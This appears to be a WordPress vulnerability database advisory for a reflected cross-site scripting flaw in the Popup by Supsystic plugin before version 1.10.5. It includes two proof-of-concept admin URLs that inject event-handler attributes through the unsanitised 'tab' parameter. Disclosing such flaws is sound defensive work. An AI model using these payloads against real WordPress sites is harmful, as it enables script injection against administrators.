WordPress Plugin Vulnerabilities
Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS)
Description
The plugin did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
Proof of Concept
/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(1)// /wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
0xB9
Submitter
0xB9
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-19 (about 3 years ago)
Added
2021-04-19 (about 3 years ago)
Last Updated
2021-04-20 (about 3 years ago)